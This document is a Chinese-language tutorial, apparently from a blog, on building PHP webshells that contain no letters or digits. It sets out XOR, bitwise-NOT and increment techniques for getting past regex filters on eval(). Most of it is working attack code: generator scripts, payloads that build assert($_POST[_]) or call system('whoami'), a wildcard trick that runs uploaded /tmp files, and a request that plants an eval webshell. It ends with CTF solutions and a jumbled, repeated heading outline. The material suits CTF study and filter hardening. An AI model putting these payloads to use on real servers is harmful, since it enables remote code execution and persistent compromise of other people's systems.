无字母数字Webshell技术研究与绕过方法<\/h1>

一、基础知识<\/h2>

1. 问题定义<\/h3>
无字母数字Webshell指的是在以下限制条件下构造可执行代码：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>if<\/span>(!<\/span>preg_match<\/span>('\/[a-z0-9]\/is'<\/span>, $_GET['shell'<\/span>])){
<\/span><\/span>    eval<\/span>($_GET['shell'<\/span>]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. PHP异或运算<\/h3>

字符异或原理：两个字符的ASCII码二进制表示进行异或运算<\/li>
示例：<\/li>
<\/ul>
<?<\/span>php<\/span>
<\/span><\/span>echo<\/span> "5"<\/span> ^<\/span> "Z"<\/span>;  \/\/ 输出"o"
<\/span><\/span><\/span>\/\/ 5(53):00110101, Z(90):01011010 → 异或结果111(111)=o
<\/span><\/span><\/span><\/code><\/pre>3. PHP取反运算<\/h3>

对汉字字符的特定字节取反可获得ASCII字符<\/li>
示例：<\/li>
<\/ul>
$_ =<\/span> "卢"<\/span>;
<\/span><\/span>print<\/span>(~<\/span>($_ {1<\/span>}));  \/\/ 输出"r"
<\/span><\/span><\/span>\/\/ "\x8d"取反得到"r"
<\/span><\/span><\/span><\/code><\/pre>4. PHP版本差异<\/h3>

PHP5<\/strong>：

assert()<\/code>是函数，可用$_=assert;$_()<\/code>形式调用<\/li>
不支持($a)()<\/code>调用方式<\/li>
<\/ul>
<\/li>
PHP7<\/strong>：

assert()<\/code>变为语言结构<\/li>
支持('phpinfo')();<\/code>调用方式<\/li>
<\/ul>
<\/li>
<\/ul>
5. PHP短标签<\/h3>

<?= ?><\/code>总是可用（PHP5.4+）<\/li>
<? ?><\/code>需要short_open_tag<\/code>开启<\/li>
<\/ul>
6. 反引号执行<\/h3>
<?=<\/span> `whoami`<\/span> ?><\/span>  \/\/ 直接执行系统命令
<\/span><\/span><\/span><\/code><\/pre>二、绕过方法<\/h2>
方法一：异或构造法<\/h3>
原理<\/h4>
通过两个非字母数字字符串异或得到目标函数名<\/p>
POC生成器<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$shell =<\/span> "assert"<\/span>;
<\/span><\/span>$result1 =<\/span> ""<\/span>;
<\/span><\/span>$result2 =<\/span> ""<\/span>;
<\/span><\/span>for<\/span>($num=<\/span>0<\/span>;$num<=<\/span>strlen<\/span>($shell);$num++<\/span>){
<\/span><\/span>    for<\/span>($x=<\/span>33<\/span>;$x<=<\/span>126<\/span>;$x++<\/span>){
<\/span><\/span>        if<\/span>(judge<\/span>(chr<\/span>($x))){
<\/span><\/span>            for<\/span>($y=<\/span>33<\/span>;$y<=<\/span>126<\/span>;$y++<\/span>){
<\/span><\/span>                if<\/span>(judge<\/span>(chr<\/span>($y))){
<\/span><\/span>                    $f =<\/span> chr<\/span>($x)^<\/span>chr<\/span>($y);
<\/span><\/span>                    if<\/span>($f ==<\/span> $shell[$num]){
<\/span><\/span>                        $result1.=<\/span>chr<\/span>($x);
<\/span><\/span>                        $result2.=<\/span>chr<\/span>($y);
<\/span><\/span>                        break<\/span> 2<\/span>;
<\/span><\/span>                    }
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> $result1;
<\/span><\/span>echo<\/span> "<br>"<\/span>;
<\/span><\/span>echo<\/span> $result2;
<\/span><\/span>function<\/span> judge<\/span>($c){
<\/span><\/span>    if<\/span>(!<\/span>preg_match<\/span>('\/[a-z0-9]\/is'<\/span>, $c)){
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>示例Payload<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_ =<\/span> "!((%)("<\/span>^<\/span>"@[[@[<\/span>\\<\/span>"<\/span>;  \/\/ 构造出"assert"
<\/span><\/span><\/span><\/span>$__ =<\/span> "!+\/(("<\/span>^<\/span>"~{`{|"<\/span>;    \/\/ 构造出"_POST"
<\/span><\/span><\/span><\/span>$___ =<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>__<\/span>;              \/\/ $_POST
<\/span><\/span><\/span><\/span>$_($___[_<\/span>]);              \/\/ assert($_POST[_])
<\/span><\/span><\/span><\/code><\/pre>方法二：取反构造法<\/h3>
原理<\/h4>
通过对汉字字符的特定字节取反获得目标字符<\/p>
POC生成器<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Content-type:text\/html;charset=utf-8"<\/span>);
<\/span><\/span>$shell =<\/span> "assert"<\/span>;
<\/span><\/span>$result =<\/span> ""<\/span>;
<\/span><\/span>$arr =<\/span> array<\/span>();
<\/span><\/span>$word =<\/span> "一乙二十丁厂七卜..."<\/span>; \/\/ 3000+汉字
<\/span><\/span><\/span><\/span>function<\/span> mb_str_split<\/span>($string){
<\/span><\/span>    return<\/span> preg_split<\/span>('\/\/u'<\/span>, $string);
<\/span><\/span>}
<\/span><\/span>foreach<\/span>(mb_str_split<\/span>($word) as<\/span> $c){
<\/span><\/span>    $arr[]=<\/span>$c;
<\/span><\/span>}
<\/span><\/span>for<\/span>($x=<\/span>0<\/span>;$x<<\/span>strlen<\/span>($shell);$x++<\/span>){
<\/span><\/span>    for<\/span>($y=<\/span>0<\/span>;$y<<\/span>count<\/span>($arr);$y++<\/span>){
<\/span><\/span>        $k =<\/span> $arr[$y];
<\/span><\/span>        if<\/span>($shell[$x] ==<\/span> ~<\/span>($k{1<\/span>})){
<\/span><\/span>            $result.=<\/span>$k;
<\/span><\/span>            break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> $result;
<\/span><\/span><\/code><\/pre>示例Payload<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_++<\/span>; \/\/ $_=1
<\/span><\/span><\/span><\/span>$__=<\/span>"极"<\/span>; $___=~<\/span>($__{$_}); \/\/ "a"
<\/span><\/span><\/span><\/span>$__=<\/span>"区"<\/span>; $___.=~<\/span>($__{$_}); \/\/ "s"
<\/span><\/span><\/span><\/span>$__=<\/span>"区"<\/span>; $___.=~<\/span>($__{$_}); \/\/ "s"
<\/span><\/span><\/span><\/span>$__=<\/span>"皮"<\/span>; $___.=~<\/span>($__{$_}); \/\/ "e"
<\/span><\/span><\/span><\/span>$__=<\/span>"十"<\/span>; $___.=~<\/span>($__{$_}); \/\/ "r"
<\/span><\/span><\/span><\/span>$__=<\/span>"勺"<\/span>; $___.=~<\/span>($__{$_}); \/\/ "t" → "assert"
<\/span><\/span><\/span><\/span>$____=<\/span>'_'<\/span>;
<\/span><\/span>$__=<\/span>"寸"<\/span>; $____.=~<\/span>($__{$_}); \/\/ "P"
<\/span><\/span><\/span><\/span>$__=<\/span>"小"<\/span>; $____.=~<\/span>($__{$_}); \/\/ "O"
<\/span><\/span><\/span><\/span>$__=<\/span>"欠"<\/span>; $____.=~<\/span>($__{$_}); \/\/ "S"
<\/span><\/span><\/span><\/span>$__=<\/span>"立"<\/span>; $____.=~<\/span>($__{$_}); \/\/ "T" → "_POST"
<\/span><\/span><\/span><\/span>$_=<\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>____<\/span>; \/\/ $_=$_POST
<\/span><\/span><\/span><\/span>$___($_[_<\/span>]); \/\/ assert($_POST[_])
<\/span><\/span><\/span><\/code><\/pre>优化版（十六进制表示）<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_=~<\/span>"%9e%8c%8c%9a%8d%8b"<\/span>; \/\/ "assert"
<\/span><\/span><\/span><\/span>$__=~<\/span>"%a0%af%b0%ac%ab"<\/span>;   \/\/ "_POST"
<\/span><\/span><\/span><\/span>$___=<\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>__<\/span>;                \/\/ $_POST
<\/span><\/span><\/span><\/span>$_($___[_<\/span>]);              \/\/ assert($_POST[_])
<\/span><\/span><\/span><\/code><\/pre>方法三：自增构造法<\/h3>
原理<\/h4>

通过数组转字符串得到"A"（"Array"首字母）<\/li>
通过自增得到其他字母<\/li>
<\/ol>
示例Payload<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_ =<\/span> [].<\/span>''<\/span>;       \/\/ "Array"
<\/span><\/span><\/span><\/span>$___ =<\/span> $_[$__];   \/\/ "A" ($__未定义默认为0)
<\/span><\/span><\/span><\/span>$__ =<\/span> $___;       \/\/ $__="A"
<\/span><\/span><\/span><\/span>$_ =<\/span> $___;        \/\/ $_="A"
<\/span><\/span><\/span>\/\/ 通过多次自增构造"assert"和"_POST"
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>$___($_[_<\/span>]);      \/\/ ASSERT($_POST[_])
<\/span><\/span><\/span><\/code><\/pre>三、进阶绕过技术<\/h2>
1. 过滤下划线(_)的绕过<\/h3>
<?=<\/span> `{${~"%a0%b8%ba%ab"}[%a0]}`<\/span> ?><\/span>
<\/span><\/span><\/span>\/\/ ~"%a0%b8%ba%ab" = "_GET"
<\/span><\/span><\/span><\/code><\/pre>2. 过滤分号(;)的绕过<\/h3>

使用短标签形式避免使用分号<\/li>
<\/ul>
3. PHP7下的特殊调用<\/h3>
(~%<\/span>9<\/span>c<\/span>%<\/span>9<\/span>e<\/span>%<\/span>93<\/span>%<\/span>93<\/span>%<\/span>a0<\/span>%<\/span>8<\/span>a<\/span>%<\/span>8<\/span>c<\/span>%<\/span>9<\/span>a<\/span>%<\/span>8<\/span>d<\/span>%<\/span>a0<\/span>%<\/span>99<\/span>%<\/span>8<\/span>a<\/span>%<\/span>91<\/span>%<\/span>9<\/span>c<\/span>)(~%<\/span>8<\/span>c<\/span>%<\/span>86<\/span>%<\/span>8<\/span>c<\/span>%<\/span>8<\/span>b<\/span>%<\/span>9<\/span>a<\/span>%<\/span>92<\/span>,~%<\/span>88<\/span>%<\/span>97<\/span>%<\/span>90<\/span>%<\/span>9<\/span>e<\/span>%<\/span>92<\/span>%<\/span>96<\/span>,''<\/span>);
<\/span><\/span>\/\/ 相当于 call_user_func('system','whoami')
<\/span><\/span><\/span><\/code><\/pre>4. PHP5下的文件执行<\/h3>

上传包含PHP代码的文件（默认存储在\/tmp\/phpXXXXXX）<\/li>
执行命令：. \/???\/?????????<\/code>（匹配\/tmp下的临时文件）<\/li>
<\/ol>
示例数据包<\/h4>
POST \/?code=?><?=`.+\/???\/?????????[A-Z]`?> HTTP\/1.1
...
--123
Content-Disposition:form-data;name="file";filename="1.txt"
echo "<?php eval(\$_POST['shell']);" > success.php
--123--
<\/code><\/pre>
四、实战题目分析<\/h2>
题目1：基本限制<\/h3>
if<\/span>(!<\/span>preg_match<\/span>("\/[A-Za-z0-9_]+\/"<\/span>, $code)){
<\/span><\/span>    @<\/span>eval<\/span>($code);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解法1：无_构造<\/h4>
?><\/span><?= `{${~"%a0%b8%ba%ab"}[%a0]}` ?>
<\/span><\/span><\/span><\/code><\/pre>解法2：异或构造<\/h4>
?><\/span><?= `{${"!%27%25("^"%7e%60%60%7c"}[%a0]}` ?>
<\/span><\/span><\/span><\/code><\/pre>题目2：更严格限制<\/h3>
if<\/span>(preg_match<\/span>("\/[A-Za-z0-9_<\/span>\$<\/span>]+\/"<\/span>, $code)){
<\/span><\/span>    die<\/span>("NO."<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解法：通配符匹配<\/h4>
?><\/span><?= `\/???\/??? ????.???` ?>  \/\/ 匹配\/bin\/cat flag.php
<\/span><\/span><\/span><\/code><\/pre>题目3：De1ctf Hard_Pentest_1<\/h3>
限制：\/[a-z0-9;~^<\/code>&|]\/is`<\/p>
解法：自增构造+短标签<\/h4>
<?=<\/span> $_=<\/span>[]?><\/span><?= $_=@"$_"?><?= $_=$_['!'=='@']?><?= $___=$_?>... 
<\/span><\/span><\/span>\/\/ 长Payload通过自增构造assert和_POST
<\/span><\/span><\/span><\/code><\/pre>五、总结对比<\/h2>



方法<\/th>
优点<\/th>
缺点<\/th>
适用场景<\/th>
<\/tr>
<\/thead>


异或构造<\/td>
Payload较短<\/td>
需要生成工具<\/td>
长度限制不严格的情况<\/td>
<\/tr>

取反构造<\/td>
Payload较短<\/td>
需要汉字字符<\/td>
允许使用汉字的场景<\/td>
<\/tr>

自增构造<\/td>
无需特殊字符<\/td>
Payload非常长<\/td>
严格过滤特殊字符的情况<\/td>
<\/tr>
<\/tbody>
<\/table>
注意事项<\/strong>：<\/p>

实际使用时需要对特殊字符进行URL编码<\/li>
不同PHP版本有差异，需针对性构造<\/li>
此类Webshell熵值高，实战中易被检测<\/li>
<\/ol>
无字母数字Webshell技术研究与绕过方法<\/h1>

一、基础知识<\/h2>

二、绕过方法<\/h2>

方法一：异或构造法<\/h3>

原理<\/h4> 通过两个非字母数字字符串异或得到目标函数名<\/p>

方法二：取反构造法<\/h3>

原理<\/h4> 通过对汉字字符的特定字节取反获得目标字符<\/p>

方法三：自增构造法<\/h3>

三、进阶绕过技术<\/h2>

四、实战题目分析<\/h2>

题目3：De1ctf Hard_Pentest_1<\/h3> 限制：\/[a-z0-9;~^<\/code>&|]\/is`<\/p>

原理<\/h4>
通过两个非字母数字字符串异或得到目标函数名<\/p>

原理<\/h4>
通过对汉字字符的特定字节取反获得目标字符<\/p>

题目3：De1ctf Hard_Pentest_1<\/h3>
限制：\/[a-z0-9;~^<\/code>&|]\/is`<\/p>
